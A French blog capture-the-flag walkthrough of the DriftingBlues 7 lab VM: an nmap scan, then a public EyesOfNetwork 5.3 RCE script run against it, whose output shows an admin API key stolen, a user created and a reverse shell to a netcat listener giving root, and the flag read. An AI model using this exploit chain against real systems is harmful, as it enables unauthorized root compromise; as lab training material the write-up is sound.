Accueil Solution du CTF DriftingBlues
Post
Annuler

Solution du CTF DriftingBlues

No bullshit

Attaquons le 7ème opus de cette saga de CTF. Comme vous le verrez ça va être très succin.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
Not shown: 65527 closed tcp ports (reset) 
PORT     STATE SERVICE         VERSION 
22/tcp   open  ssh             OpenSSH 7.4 (protocol 2.0) 
| ssh-hostkey:  
|   2048 c4:fa:e5:5f:88:c1:a1:f0:51:8b:ae:e3:fb:c1:27:72 (RSA) 
|   256 01:97:8b:bf:ad:ba:5c:78:a7:45:90:a1:0a:63:fc:21 (ECDSA) 
|_  256 45:28:39:e0:1b:a8:85:e0:c0:b0:fa:1f:00:8c:5e:d1 (ED25519) 
66/tcp   open  http            SimpleHTTPServer 0.6 (Python 2.7.5) 
|_http-title: Scalable Cost Effective Cloud Storage for Developers 
|_http-server-header: SimpleHTTP/0.6 Python/2.7.5 
80/tcp   open  http            Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16 mod_perl/2.0.11 Perl/v5.16.3) 
|_http-title: Did not follow redirect to https://192.168.56.12/ 
|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16 mod_perl/2.0.11 Perl/v5.16.3 
111/tcp  open  rpcbind         2-4 (RPC #100000) 
| rpcinfo:  
|   program version    port/proto  service 
|   100000  2,3,4        111/tcp   rpcbind 
|   100000  2,3,4        111/udp   rpcbind 
|   100000  3,4          111/tcp6  rpcbind 
|_  100000  3,4          111/udp6  rpcbind 
443/tcp  open  ssl/http        Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16 mod_perl/2.0.11 Perl/v5.16.3) 
| http-title: EyesOfNetwork 
|_Requested resource was /login.php## 
| ssl-cert: Subject: commonName=localhost/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=-- 
| Not valid before: 2021-04-03T14:37:22 
|_Not valid after:  2022-04-03T14:37:22 
|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16 mod_perl/2.0.11 Perl/v5.16.3 
|_ssl-date: TLS randomness does not represent time 
2403/tcp open  taskmaster2000? 
3306/tcp open  mysql           MariaDB (unauthorized) 
8086/tcp open  http            InfluxDB http admin 1.7.9 
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).

Il y a une appli web qui s’appelle EyesOfNetwork servie sur le port 443. Je ne savais même pas que ça existait mais il existe un exploit de Clément Billac pour une vulnérabilité RCE.

L’exploit en question semble exploiter 3 CVEs pour parvenir à ses fins. Voyons ce que ça donne :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
$ python /tmp/eonrce.py https://192.168.56.12/ -ip 192.168.56.1 -port 9999 
+-----------------------------------------------------------------------------+ 
| EyesOfNetwork 5.3 RCE (API v2.4.2)                                          | 
| 02/2020 - Clément Billac Twitter: @h4knet                                  | 
+-----------------------------------------------------------------------------+ 

[*] EyesOfNetwork login page found 
[*] EyesOfNetwork API page found. API version: 2.4.2 
[+] Admin user key obtained: 49dc21d3dc692e2341e6c6b075b1fad4a9a69bbcc6a63f8886252be7f1c6454d 
[+] New user h4ker successfully created. ID:2 
[+] Successfully authenticated 
[+] Discovery job successfully created with ID: 1&review=1" id="completemsg" style="display: none;"> 
<div class="roundedcorner_success_box"> 
<div class="roundedcorner_success_top"><div></div></div> 
<div class="roundedcorner_success_content"> 
              Auto-Discovery Complete.  Click to Continue To Reviewing Found Devices 
              </div> 
<div class="roundedcorner_success_bottom"><div></div></div> 
</div></a> 
[*]  Spawning netcat listener:  
Listening on 192.168.56.1 9999 
Connection received on 192.168.56.12 43406 
sh: no job control in this shell 
sh-4.2# id 
id 
uid=0(root) gid=0(root) groups=0(root) 
sh-4.2# cd /root 
cd /root 
sh-4.2# ls -al 
ls -al 
total 72 
dr-xr-x---.  4 root root  4096 Apr  3  2021 . 
dr-xr-xr-x. 19 root root  4096 Apr  7  2021 .. 
-rw-------   1 root root   319 Apr  7  2021 .bash_history 
-rw-r--r--.  1 root root   176 Dec 28  2013 .bash_profile 
-rw-r--r--.  1 root root   100 Dec 28  2013 .cshrc 
drwxr-----.  3 root root  4096 Apr  3  2021 .pki 
-rw-r--r--.  1 root root   129 Dec 28  2013 .tcshrc 
-rw-------.  1 root root  1401 Apr  3  2021 anaconda-ks.cfg 
-rwxr-xr-x.  1 root root   248 Apr  3  2021 eon 
-rw-r--r--   1 root root  1823 Apr  3  2021 flag.txt 
-rw-r--r--   1 root root 17477 Apr  7  2021 index.htm 
drwxr-xr-x.  2 root root  4096 Apr  3  2021 index_files 
-rw-r--r--   1 root root   514 Feb  7  2021 logdel2 
-rwxr-xr-x.  1 root root    52 Apr  3  2021 upit.sh 
sh-4.2# cat flag.txt 
cat flag.txt 
flag 1/1 
░░░░░░▄▄▄▄▀▀▀▀▀▀▀▀▄▄▄▄▄▄▄ 
░░░░░█░░░░░░░░░░░░░░░░░░▀▀▄ 
░░░░█░░░░░░░░░░░░░░░░░░░░░░█ 
░░░█░░░░░░▄██▀▄▄░░░░░▄▄▄░░░░█ 
░▄▀░▄▄▄░░█▀▀▀▀▄▄█░░░██▄▄█░░░░█ 
█░░█░▄░▀▄▄▄▀░░░░░░░░█░░░░░░░░░█ 
█░░█░█▀▄▄░░░░░█▀░░░░▀▄░░▄▀▀▀▄░█ 
░█░▀▄░█▄░█▀▄▄░▀░▀▀░▄▄▀░░░░█░░█ 
░░█░░░▀▄▀█▄▄░█▀▀▀▄▄▄▄▀▀█▀██░█ 
░░░█░░░░██░░▀█▄▄▄█▄▄█▄▄██▄░░█ 
░░░░█░░░░▀▀▄░█░░░█░█▀█▀█▀██░█ 
░░░░░▀▄░░░░░▀▀▄▄▄█▄█▄█▄█▄▀░░█ 
░░░░░░░▀▄▄░░░░░░░░░░░░░░░░░░░█ 
░░▐▌░█░░░░▀▀▄▄░░░░░░░░░░░░░░░█ 
░░░█▐▌░░░░░░█░▀▄▄▄▄▄░░░░░░░░█ 
░░███░░░░░▄▄█░▄▄░██▄▄▄▄▄▄▄▄▀ 
░▐████░░▄▀█▀█▄▄▄▄▄█▀▄▀▄ 
░░█░░▌░█░░░▀▄░█▀█░▄▀░░░█ 
░░█░░▌░█░░█░░█░░░█░░█░░█ 
░░█░░▀▀░░██░░█░░░█░░█░░█ 
░░░▀▀▄▄▀▀░█░░░▀▄▀▀▀▀█░░█ 

congratulations!

Voilà voilà… C’est terminé. A noter que le port 66 fait tourner le serveur HTTP builtin de Python depuis le dossier de root du coup via énumération on peut aussi obtenir le flag.

Published January 21 2022 at 12:04

Cet article est sous licence CC BY 4.0 par l'auteur.